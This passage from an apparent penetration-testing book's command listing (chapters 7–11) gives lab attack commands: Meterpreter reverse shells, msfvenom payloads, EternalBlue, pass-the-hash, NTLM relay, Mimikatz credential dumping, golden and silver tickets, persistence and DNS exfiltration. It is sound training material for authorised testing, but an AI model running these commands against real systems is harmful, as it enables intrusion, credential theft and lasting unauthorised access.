binaries/whoami.exe
Command 7.10

kali@kali:~$ sudo apt update


kali@kali:~$ sudo apt install shellter
Command 7.11

kali@kali:~$ sudo dpkg --add-architecture i386


kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install wine32
Command 7.12
kali@kali:~$ cp /usr/share/windows-binaries/vncviewer.exe
./
Command 7.13

kali@kali:~$ sudo shellter


Command 7.14

kali@kali:~$ python3 -m http.server 8080


Command 7.15

kali@kali:~$ msfconsole
Command 7.16

msf6 > use exploit/multi/handler


msf6 exploit(multi/handler) > set payload
windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 172.30.1.29
msf6 exploit(multi/handler) > set AutoRunScript
post/windows/manage/migrate
msf6 exploit(multi/handler) > exploit
Command 7.17

kali@kali:~$ sudo apt update


kali@kali:~$ sudo apt upgrade
Command 7.18

kali@kali:~$ sudo apt install realtek-rtl88xxau-dkms


Command 7.19

kali@kali:~$ git clone https://github.com/aircrack-


ng/rtl8812au
Command 7.20
kali@kali:~$ cd rtl8812au
kali@kali:~/rtl8812au$ sudo make
Command 7.21

kali@kali:~/rtl8812au$ sudo make install


Command 7.22

kali@kali:~$ sudo ifconfig wlan0 down


Command 7.23

kali@kali:~$ sudo iwconfig wlan0 mode monitor


Command 7.24

kali@kali:~$ sudo ifconfig wlan0 up


Command 7.25

kali@kali:~$ sudo aireplay-ng -9 wlan0


Command 7.26

kali@kali:~$ sudo ifconfig wlan0 down


kali@kali:~$ sudo iwconfig wlan0 mode managed
kali@kali:~$ sudo iwconfig wlan0 up
Command 7.27

kali@kali:~$ sudo airmon-ng check kill


Command 7.28

kali@kali:~$ sudo airmon-ng start wlan0


Command 7.29

kali@kali:~$ sudo aireplay-ng -9 wlan0mon


Command 7.30
kali@kali:~$ sudo airmon-ng stop wlan0mon
Command 7.31

Further reading
To learn more about Airmon-ng, go to https://www.aircrack-
ng.org/doku.php?id=airmon-ng.
Chapter 8
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

 Windows 10 as a host operating system

 Metasploitable 2:
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

 Metasploitable 3: https://app.vagrantup.com/rapid7/boxes/metasploitable3-
win2k8

 A dedicated hardware-based GPU/graphics card on your attacker computer

Images

Figure 8.1 – Passive host discovery


Figure 8.2 – Actively detecting live systems

Figure 8.3 – Checking NetBIOS information

Figure 8.4 – Identifying open service ports


Figure 8.5 – Profiling a target

Figure 8.6 – Profiling live systems

Figure 8.7 – Checking for RDP on a target


Figure 8.8 – User credentials found

Figure 8.9 – Online password cracking with Hydra

Figure 8.10 – RDP session


Figure 8.11 – Discovering a running service

Figure 8.12 – Researching a vulnerability and its exploits


Figure 8.13 – Searching for modules

Figure 8.14 – Exploiting vsFTPd

Figure 8.15 – Creating a Python-based pseudo-terminal shell

Figure 8.16 – Viewing the shadow file in Linux


Figure 8.17 – Cracking password hashes

Figure 8.18 – Checking the status of the SMB service ports

Figure 8.19 – Searching for EternalBlue exploits


Figure 8.20 – Checking the vulnerability status of a host

Figure 8.21 – Retrieving user accounts


Figure 8.22 – Identifying a hash

Figure 8.23 – Live password cracking

Figure 8.24 – Viewing the recovered passwords


Figure 8.25 – Exploiting SMB using the PsExec payload

Figure 8.26 – Gaining a Windows shell

Figure 8.27 – Viewing remote file shares


Figure 8.28 – Accessing a remote share

Figure 8.29 – Viewing the contents within a remote share


Figure 8.30 – Passing the hash

Figure 8.31 – Passing the hash with Impacket


Figure 8.32 – Passing the hash with FreeRDP

Figure 8.33 – Checking the SSH port's status


Figure 8.34 – Enumerating SSH usernames

Figure 8.35 – Gaining a shell

Figure 8.36 – Interacting with a session


Figure 8.37 – Checking for an open service port

Figure 8.38 – Checking the web application

Figure 8.39 – Checking HTTPS


Figure 8.40 – Searching for WinRM modules

Figure 8.41 – Using the WinRM scanner on Metaploit


Figure 8.42 – Exploiting WinRM

Figure 8.43 – Searching for ElasticSearch modules

Figure 8.44 – Exploiting Elasticsearch


Figure 8.45 – Searching for SNMP enumeration modules

Figure 8.46 – Enumerating SNMP information

Code and Commands


kali@kali:~$ sudo netdiscover -r 172.30.1.0/24
Command 8.1

kali@kali:~$ nmap -sn 172.30.1.0/24


Command 8.2

kali@kali:~$ sudo nbtscan -r 172.30.1.0/24


Command 8.3
kali@kali:~$ nmap 172.30.1.21
Command 8.4

kali@kali:~$ nmap -A 172.30.1.21


Command 8.5

kali@kali:~$ nmap -A 172.30.1.23


Command 8.6

kali@kali:~$ gunzip /usr/share/wordlists/rockyou.txt.gz


Command 8.7

kali@kali:~$ ncrack -v -T 3 -u Administrator -P


/usr/share/wordlists/rockyou.txt rdp://172.30.1.21
Command 8.8

kali@kali:~$ hydra -t 4 -l Administrator -P


/usr/share/wordlists/rockyou.txt rdp://172.30.1.21
Command 8.9

kali@kali:~$ rdesktop -u Administrator -p vagrant


172.30.1.21 -g 1280x1024
Command 8.10

kali@kali:~$ cewl example.com -m 6 -w


output_dictionary_file.txt
Command 8.11

kali@kali:~$ crunch 4 4 0123456789ABC -o output_file.txt


Command 8.12

kali@kali:~$ nmap -A -p 21 172.30.1.23


Command 8.13
kali@kali:~$ msfconsole
Command 8.14

msf6 > search vsftpd


Command 8.15

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS
172.30.1.23
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
Command 8.16

python -c 'import pty; pty.spawn("/bin/bash")'


Command 8.17

root@metasploitable:/# cat /etc/shadow


Command 8.18

kali@kali:~$ john user_hashes.txt --


wordlist=/usr/share/wordlists/rockyou.txt
Command 8.19

kali@kali:~$ nmap -p 136-139,445 172.30.1.21


Command 8.20

kali@kali:~$ msfconsole
Command 8.21

msf6 > search ms17-010


Command 8.22
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS
172.30.1.21
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
Command 8.23

msf6 > use exploit/windows/smb/ms17_010_eternalblue


Command 8.24

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS


172.30.1.21
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST
172.30.1.20
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
Command 8.25

meterpreter > hashdump


Command 8.26

Username : Security Identifier (SID) : LM hash : NTLM hash


Command 8.27

Administrator:aad3b435b51404eeaad3b435b51404ee:e02bc503339d
51f71d913c245d35b50b
Code 8.1

C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3>
hashcat -m 1000 passwordhashes.txt -a 0 rockyou.txt
Command 8.28

C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3>
hashcat -m 1000 passwordhashes.txt -a 0 rockyou.txt --show
Command 8.29
kali@kali:~$ msfconsole
Command 8.30

msf6 > use exploit/windows/smb/psexec


Command 8.31

msf6 exploit(windows/smb/psexec) > set RHOSTS 172.30.1.21


msf6 exploit(windows/smb/psexec) > set LHOST 172.30.1.20
Command 8.32

msf6 exploit(windows/smb/psexec) > set AutoRunScript


post/windows/manage/migrate
Command 8.33

msf6 exploit(windows/smb/psexec) > set SMBUSER


Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass vagrant
msf6 exploit(windows/smb/psexec) > exploit
Command 8.34

kali@kali:~$ smbclient -L \\\\172.30.1.21\\ -U


Administrator
Command 8.35

kali@kali:~$ smbclient \\\\172.30.1.21\\ADMIN$ -U


Administrator
Command 8.36

kali@kali:~$ smbclient \\\\172.30.1.21\\C$ -U Administrator


Command 8.37
smb: \> get jack_of_diamonds.png
smb: \> exit
Command 8.38

kali@kali:~$ pth-winexe -U
Administrator%aad3b435b51404eeaad3b435b51404ee:e02bc503339d
51f71d913c245d35b50b //172.30.1.21 cmd
Command 8.39

kali@kali:~$ impacket-psexec [email protected] -


hashes
aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d
35b50b
Command 8.40

kali@kali:~$ xfreerdp /u:Administrator


/pth:e02bc503339d51f71d913c245d35b50b /v:172.30.1.21
Command 8.41

kali@kali:~$ nmap -A -p 22 172.30.1.21


Command 8.42

kali@kali:~$ msfconsole
Command 8.43

msf6 > use auxiliary/scanner/ssh/ssh_enumusers


Command 8.44

msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS


172.30.1.21
Command 8.45
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE
/usr/share/wordlists/metasploit/default_users_for_services_
unhash.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run
Command 8.46

msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE


/usr/share/wordlists/metasploit/default_users_for_services_
unhash.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run
Command 8.47

msf6 > use auxiliary/scanner/ssh/ssh_login


msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS
172.30.1.21
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME
Administrator
msf6 auxiliary(scanner/ssh/ssh_login) > set PASSWORD
vagrant
msf6 auxiliary(scanner/ssh/ssh_login) > run
Command 8.48

kali@kali:~$ medusa -h 172.30.1.21 -u Administrator -P


/usr/share/wordlists/rockyou.txt -M ssh
Command 8.49

ACCOUNT FOUND: [ssh] Host: 172.30.1.21 User: Administrator


Password: vagrant [SUCCESS]
Command 8.50

kali@kali:~$ nmap -A -p 5985 172.30.1.21


Command 8.51
msf6 > use auxiliary/scanner/winrm/winrm_cmd
msf6 auxiliary(scanner/winrm/winrm_cmd) > set USERNAME
Administrator
msf6 auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD
vagrant
msf6 auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS
172.30.1.21
msf6 auxiliary(scanner/winrm/winrm_cmd) > run
Command 8.52

msf6 > use exploit/windows/winrm/winrm_script_exec


msf6 exploit(windows/winrm/winrm_script_exec) > set RHOSTS
172.30.1.21
msf6 exploit(windows/winrm/winrm_script_exec) > set LHOSTS
172.30.1.20
Command 8.53

msf6 exploit(windows/winrm/winrm_script_exec) > set


FORCE_VBS true
Command 8.54

msf6 exploit(windows/winrm/winrm_script_exec) > set


USERNAME Administrator
msf6 exploit(windows/winrm/winrm_script_exec) > set
PASSWORD vagrant
msf6 exploit(windows/winrm/winrm_script_exec) > exploit
Command 8.55

msf6 > use exploit/multi/elasticsearch/script_mvel_rce


Command 8.56
msf6 exploit(multi/elasticsearch/script_mvel_rce) > set
RHOSTS 172.30.1.21
msf6 exploit(multi/elasticsearch/script_mvel_rce) > set
LHOST 172.30.1.20
msf6 exploit(multi/elasticsearch/script_mvel_rce) > exploit
Command 8.57

msf6 > use auxiliary/scanner/snmp/snmp_enum


msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS
172.30.1.21
msf6 auxiliary(scanner/snmp/snmp_enum) > run
Command 8.58

Further reading
To learn more about the topics that were covered in this chapter, take a look at the
following resources:
 Watering hole 101: https://www.trendmicro.com/vinfo/us/threat-
encyclopedia/web-attack/137/watering-hole-101

 Drive-by Compromise: https://attack.mitre.org/techniques/T1189/

 Credential access: https://attack.mitre.org/tactics/TA0006/


Chapter 9
Images

Figure 9.1 – Lab topology

Figure 9.2 – Retrieving system information

Figure 9.3 – Determining user privileges


Figure 9.4 – Extracting password hashes from the SAM file

Figure 9.5 – Viewing running processes

Figure 9.6 – Migrating processes

Figure 9.7 – Uploading a file


Figure 9.8 – Spawning the Windows native shell

Figure 9.9 – Interacting with the Windows native shell

Figure 9.10 – Downloading files

Figure 9.11 – Performing privilege escalation


Figure 9.12 – Viewing tokens

Figure 9.13 – Observing impersonation tokens

Figure 9.14 – Impersonating another user


Figure 9.15 – Unable to view tokens as the administrator

Figure 9.16 – Escalating privileges

Figure 9.17 – Creating a new user


Figure 9.18 – Backgrounding the Meterpreter session

Figure 9.19 – Launching a persistence payload

Figure 9.20 – Receiving a callback session

Figure 9.21 – Penetration testing lab topology


Figure 9.22 – Viewing the ARP cache

Figure 9.23 – Viewing IP addressing on Interface 11

Figure 9.24 – Discovering additional network adapters


Figure 9.25 – Checking the routing table

Figure 9.26 – Using the autoroute post-exploitation module

Figure 9.27 – Performing a port scan

Figure 9.28 – Clearing logs


Figure 9.29 – Encoding files

Figure 9.30 – Reassembled file

Figure 9.31 – Obtaining a reverse shell


Figure 9.32 – Modifying the system variables

Figure 9.33 – Creating a sensitive file

Figure 9.34 – PacketWhisper main menu


Figure 9.35 – Selecting a transfer mode and ciphers

Figure 9.36 – Previewing the cloaked data

Figure 9.37 – Starting the data exfiltration


Figure 9.38 – Data exfiltration via DNS messages

Figure 9.39 – DNS messages on Wireshark

Figure 9.40 – Extracting a file


Figure 9.41 – Setting the PCAP file

Figure 9.42 – Selecting the operating system

Figure 9.43 – Choosing the cipher

Figure 9.44 – Decoding the cloaked file


Figure 9.45 – Viewing the decloaked file

Figure 9.46 – Normal network communication

Figure 9.47 – Gratuitous ARP messages


Figure 9.48 – MITM attack

Figure 9.49 – MITM attack using Ettercap


Figure 9.50 – Capturing network packets

Figure 9.51 – Windows host ARP cache

Figure 9.52 – Verifying the MAC address of Kali Linux


Code and Commands
kali@kali:~$ sudo msfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set
payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS
172.30.1.21
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST
172.30.1.20
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
Command 9.1

meterpreter > run post/windows/manage/migrate


Command 9.2

meterpreter > upload /home/kali/vncviewer.exe c:\\


Command 9.3

C:\Windows\system32> cd\
C:\> dir
Command 9.4

meterpreter > download c:\\jack_of_diamonds.png /home/kali/


Command 9.5

meterpreter > use incognito


Command 9.6

meterpreter > list_tokens -u


Command 9.7
meterpreter > impersonate_token VAGRANT-
2008R2\\Administrator
Command 9.8

meterpreter > run post/windows/manage/enable_rdp


Command 9.10

msf6 > use exploit/windows/local/persistence


msf6 exploit(windows/local/persistence) > set SESSION 1
msf6 exploit(windows/local/persistence) > set STARTUP
SYSTEM
Command 9.11

msf6 exploit(windows/local/persistence) > set LHOST


172.30.1.20
msf6 exploit(windows/local/persistence) > set LPORT 87
msf6 exploit(windows/local/persistence) > exploit
Command 9.12

msf6 > use exploit/multi/handler


msf6 exploit(multi/handler) > set payload
windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set AutoRunScript
post/windows/manage/migrate
msf6 exploit(multi/handler) > set LHOST 172.30.1.20
msf6 exploit(multi/handler) > set LPORT 87
msf6 exploit(multi/handler) > exploit
Command 9.13

meterpreter > run post/multi/manage/autoroute


Command 9.14
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS
10.11.12.0/24
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 80
msf6 auxiliary(scanner/portscan/tcp) > run
Command 9.15

kali@kali:~$ /usr/bin/exe2hex -x vncviewer.exe


Command 9.16

kali@kali:~$ sudo msfconsole


msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload
windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set AutoRunScript
post/windows/manage/migrate
msf6 exploit(multi/handler) > set LHOST 172.30.1.29
msf6 exploit(multi/handler) > exploit
Command 9.17

kali@kali:~$ python3 -m http.server 8080


Command 9.18

kali@kali:~$ git clone https://github.com/TryCatchHCF/PacketWhisper


kali@kali:~$ wget
https://github.com/TryCatchHCF/PacketWhisper/archive/refs/heads/master.zip
Command 9.19

kali@kali:~$ python3 -m http.server 8080


Command 9.20
C:\Users\vagrant> cd
C:\Users\vagrant\Downloads\master\PacketWhisper-master
Command 9.21

C:\Users\vagrant\Downloads\master\PacketWhisper-master>
python packetWhisper.py
Command 9.22

kali@kali:~$ cd PacketWhisper
kali@kali:~/PacketWhisper$ python packetWhisper.py
Command 9.23

kali@kali:~$ sudo ettercap -i eth1 -T -q -S -M arp:remote


/172.30.1.24// /172.30.1.21//
Command 9.24

Further reading
To learn more on the subject, check out the following resources:
 Vulnerabilities in the application and transport layers:
https://hub.packtpub.com/vulnerabilities-in-the-application-and-transport-
layer-of-the-tcp-ip-stack/

 PTES post-exploitation: http://www.pentest-


standard.org/index.php/Post_Exploitation

 MITM attacks: https://www.rapid7.com/fundamentals/man-in-the-middle-


attacks/
Chapter 10
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

 Windows Server 2019: https://www.microsoft.com/en-


us/evalcenter/evaluate-windows-server-2019

 Windows 10 Enterprise: https://www.microsoft.com/en-


us/evalcenter/evaluate-windows-10-enterprise

 hashcat: https://hashcat.net/hashcat/

 PowerView:
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon

 Bloodhound: https://github.com/BloodHoundAD/BloodHound

Images

Figure 10.1 – Domain structure


Figure 10.2 – Forest

Figure 10.3 – Red Team Lab topology

Figure 10.4 – Checking the domain's network status


Figure 10.5 – Downloading the PowerView.ps1 file

Figure 10.6 – Retrieving the current domain's details


Figure 10.7 – Retrieving the Domain Policy

Figure 10.8 – Retrieving the domain controller's details


Figure 10.9 – Retrieving user accounts

Figure 10.10 – Retrieving computer accounts


Figure 10.11 – Retrieving groups on the domain

Figure 10.12 – Retrieving local groups


Figure 10.13 – Retrieving shares

Figure 10.14 – Retrieving forest information


Figure 10.15 – Retrieving the domains of the current forest

Figure 10.16 – Retrieving all global catalogs

Figure 10.17 – Discovering systems with local admin access


Figure 10.18 – Retrieving local administrator accounts

Figure 10.19 – Neo4j login page


Figure 10.20 – Changing the password

Figure 10.21 – Bloodhound login interface

Figure 10.22 – Extracted Active Directory data


Figure 10.23 – Viewing Database Info
Figure 10.24 – Analytics templates
Figure 10.25 – Viewing the Domain Admin's attack paths

Figure 10.26 – Viewing the Domain Admin's attack path


Figure 10.27 – Checking network interfaces

Figure 10.28 – Starting Responder

Figure 10.29 – Performing a UNC path connection


Figure 10.30 – Requesting network credentials

Figure 10.31 – Capturing the user's credentials

Figure 10.32 – Identifying the hash code


Figure 10.33 – Retrieving a user's password

Figure 10.34 – Windows 10 client SMB security status

Figure 10.35 – Windows Server 2019 SMB security status


Figure 10.36 – Modifying the Responder configuration file

Figure 10.37 – Starting Responder

Figure 10.38 – Starting the NTLM Relay attack


Figure 10.39 – Triggering an event

Figure 10.40 – Dumping the SAM database

Figure 10.41 – Triggering an event


Figure 10.42 – Gaining a reverse shell from NTLM Relay

Code and Commands


kali@kali:~$ git clone
https://github.com/PowerShellMafia/PowerSploit
kali@kali:~$ cd PowerSploit/Recon
kali@kali:~/PowerTools/PowerView$ python3 -m http.server
8080
Command 10.1

C:\Windows\system32> cd C:\Users\bob.REDTEAMLAB\Downloads
C:\Users\bob.REDTEAMLAB\Downloads> powershell -
ExecutionPolicy bypass
Command 10.2

PS C:\Users\bob.REDTEAMLAB\Downloads> . .\PowerView.ps1
Command 10.3

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetDomain
Command 10.4
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-DomainSID
S-1-5-21-634716346-3108032190-2057695417
Command 10.5

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-DomainPolicy
Command 10.6

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-
NetDomainController
Command 10.7

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetUser
Command 10.8

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetComputer
Command 10.9

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetGroup
Command 10.10

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetLocalGroup -
ComputerName dc1.redteamlab.local
Command 10.11

PS C:\Users\bob.REDTEAMLAB\Downloads> Invoke-ShareFinder -
Verbose
Command 10.12

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetGPO
Command 10.13

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetForest
Command 10.14
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetForestDomain
Command 10.15

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetForestCatalog
Command 10.16

PS C:\Users\bob.REDTEAMLAB\Downloads> Find-LocalAdminAccess
-Verbose
Command 10.17

PS C:\Users\bob.REDTEAMLAB\Downloads> Invoke-
EnumerateLocalAdmin -Verbose
Command 10.18

kali@kali:~$ sudo apt update


kali@kali:~$ sudo apt install bloodhound
Command 10.19

kali@kali:~$ sudo neo4j console


Command 10.20

kali@kali:~$ sudo bloodhound


Command 10.21

C:\Windows\system32> cd C:\Users\bob.REDTEAMLAB\Downloads
C:\Users\bob.REDTEAMLAB\Downloads> powershell -
ExecutionPolicy bypass
Command 10.22

PS C:\Users\bob.REDTEAMLAB\Downloads> . .\SharpHound.ps1
Command 10.23
PS C:\Users\bob.REDTEAMLAB\Downloads> Invoke-Bloodhound -
CollectionMethod All -Domain redteamlab.local -ZipFileName
redteamlab.zip
Command 10.24

kali@kali:~$ sudo responder -I eth2 –rdwv


Command 10.25

C:\WINDOWS\system32> cd C:\Users\Slayer\Downloads\hashcat-
6.2.3\hashcat-6.2.3
C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3>
hashcat -m 5600 NTLMv2-hash.txt rockyou.txt -O
Command 10.26

kali@kali:~$ nmap --script smb2-security-mode -p 445


192.168.42.0/24
Command 10.27

kali@kali:~$ sudo cp -R /usr/share/doc/python3-


impacket/examples /home/kali/Impacket
Command 10.28

kali@kali:~$ sudo mousepad /etc/responder/Responder.conf


Command 10.29

kali@kali:~$ sudo responder -I eth2 –rdw


Command 10.30

kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 ntlmrelayx.py -t
192.168.42.23 -smb2support
Command 10.31
kali@kali:~$ sudo msfconsole
Command 10.32

msf6 > use exploit/multi/handler


msf6 exploit(multi/handler) > set payload
windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set AutoRunScript
post/windows/manage/migrate
msf6 exploit(multi/handler) > set LHOST 192.168.42.20
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit
Command 10.33

kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp


LHOST=192.168.42.20 LPORT=4444 -f exe -o payload4.exe -e
x86/shikata_ga_nai -i 9
Command 10.34

kali@kali:~$ sudo responder -I eth2 –rdw


Command 10.35

kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 ntlmrelayx.py -t
192.168.42.23 -smb2support -e /home/kali/payload4.exe
Command 10.36
Further reading
To learn more about the topics that were covered in this chapter, visit the following
links:
 Active Directory Domain Services Overview:
https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-
started/virtual-dc/active-directory-domain-services-overview

 PowerView command list:


https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon

 Bloodhound documentation:
https://bloodhound.readthedocs.io/en/latest/index.html

 LLMNR/NBT-NS Poisoning and SMB Relay:


https://attack.mitre.org/techniques/T1557/001/
Chapter 11
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2 – https://www.kali.org/get-kali/

 Windows Server 2019 – https://www.microsoft.com/en-


us/evalcenter/evaluate-windows-server-2019

 Windows 10 Enterprise – https://www.microsoft.com/en-


us/evalcenter/evaluate-windows-10-enterprise

 mitm6 – https://github.com/fox-it/mitm6

 Mimikatz – https://github.com/gentilkiwi/mimikatz/releases

Images

Figure 11.1 – Phase 1


Figure 11.2 – Phase 2

Figure 11.3 – Phase 3


Figure 11.3 – Phase 3

Figure 11.4 – Phase 4


Figure 11.5 – Phase 5

Figure 11.6 – Configuring Certificate Services


Figure 11.7 – Summary of AD CS

Figure 11.8 – Extracting Active Directory contents

Figure 11.9 – Active Directory contents


Figure 11.10 – Taking over the domain

Figure 11.11 – Checking new user account

Figure 11.12 – Lateral movement


Figure 11.13 – Retrieving the SAM database

Figure 11.14 – Passing the hash

Figure 11.15 – Retrieving the LSA secrets

Figure 11.16 – Retrieving the TGS hash


Figure 11.17 – Retrieving the TGS password

Figure 11.18 – Launching Mimikatz


Figure 11.19 – Retrieving domain users' credentials

Figure 11.20 – Domain Administrator user credentials


Figure 11.21 – Retrieving domain users' NTLM hashes

Figure 11.22 – Retrieving the domain SID


Figure 11.23 – Creating a golden ticket

Figure 11.24 – Golden ticket


Figure 11.25 – NTLM hash of users' and computers' accounts

Figure 11.26 – Creating a silver ticket


Figure 11.27 – Silver ticket

Figure 11.28 – Creating a skeleton key


Figure 11.29 – Authenticating using the skeleton key

Code and Commands


kali@kali:~$ git clone https://github.com/fox-it/mitm6
Command 11.1

kali@kali:~$ cd mitm6
kali@kali:~/mitm6$ pip3 install -r requirements.txt
kali@kali:~/mitm6$ sudo python setup.py install
Command 11.2

kali@kali:~/mitm6$ cd mitm6
kali@kali:~/mitm6/mitm6$ python3 mitm6.py -h
Command 11.3

PS C:\Users\Administrator> Install-WindowsFeature -Name AD-


Certificate,ADCS-Cert-Authority -Restart
Command 11.4
kali@kali:~$ cd mitm6/mitm6
kali@kali:~/mitm6/mitm6$ sudo python3 mitm6.py -i eth2 -d
redteamlab.local
Command 11.5

kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 ntlmrelayx.py -6 -t
ldaps://192.168.42.22 -wh wpad.redteamlab.local -l
/home/kali/mitm6-loot
Command 11.6

[*] Dumping domain info for first time


[*] Domain info dumped into lootdir!
Command 11.7

kali@kali:~$ ls mitm6-loot
Command 11.8

[*] Authenticating against ldaps://192.168.42.22 as


REDTEAMLAB\johndoe SUCCEED
[*] Enumerating relayed user's privileges. This may take a
while on large domains
Command 11.9

kali@kali:~$ sudo apt update


kali@kali:~$ sudo apt install crackmapexec
Command 11.10

kali@kali:~$ sudo crackmapexec smb 192.168.42.0/24 -u bob -


p Password1 -d redteamlab.local
Command 11.11
kali@kali:~$ sudo crackmapexec smb 192.168.42.0/24 -u bob -
p Password1 -d redteamlab.local --sam
Command 11.12

kali@kali:~$ sudo crackmapexec smb 192.168.42.0/24 -u bob -


H ead0cc57ddaae50d876b7dd6386fa9c7 --local-auth
Command 11.13

kali@kali:~$ sudo crackmapexec smb 192.168.42.0/24 -u bob -


p Password1 -d redteamlab.local --lsa
Command 11.14

kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 GetUserSPNs.py
redteamlab.local/bob:Password1 -dc-ip 192.168.42.22 -
request
Command 11.15

C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3>
hashcat -m 13100 TGS-hash.txt rockyou.txt -O
Command 11.16

kali@kali:~$ cd Downloads
kali@kali:~/Downloads$ python3 -m http.server 8080
Command 11.17

PS C:\Users\sqladmin> Invoke-WebRequest -Uri


http://192.168.42.20:8080/mimikatz_trunk.zip -Outfile
'C:\Users\sqladmin\Downloads\mimikatz_trunk.zip'
Command 11.18
C:\Users\sqladmin> cd
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64>
mimikatz.exe
mimikatz # privilege::debug
Command 11.19

mimikatz # sekurlsa::logonpasswords
Command 11.20

mimikatz # lsadump::lsa /patch


Command 11.21

C:\Users\sqladmin> cd
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64>
mimikatz.exe
mimikatz # privilege::debug
Command 11.22

mimikatz # lsadump::lsa /inject /name:krbtgt


Command 11.23

mimikatz # kerberos::golden /user:FakeAdmin


/domain:redteamlab.local /sid:S-1-5-21-634716346-
3108032190-2057695417
/krbtgt:53456cfa6981cff6455b3f515f04bd46 /id:500
Command 11.24

mimikatz # kerberos::ptt ticket.kirbi


Command 11.25
mimikatz # misc::cmd
Command 11.26

C:\Users\sqladmin> cd
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64>
mimikatz.exe
mimikatz # privilege::debug
Command 11.27

mimikatz # lsadump::lsa /patch


Command 11.28

mimikatz # kerberos::golden /user:SilverTicket


/domain:redteamlab.local /sid:S-1-5-21-634716346-
3108032190-2057695417 /rc4:cb7b254f129981ca3ae74d21ef3a9ac4
/id:1234 /target:dc1.redteamlab.local /service:HOST
Command 11.29

mimikatz # kerberos::ptt silver_ticket.kirbi


Command 11.30

mimikatz # misc::cmd
Command 11.31

C:\Users\sqladmin> cd
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64>
mimikatz.exe
mimikatz # privilege::debug
Command 11.32
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
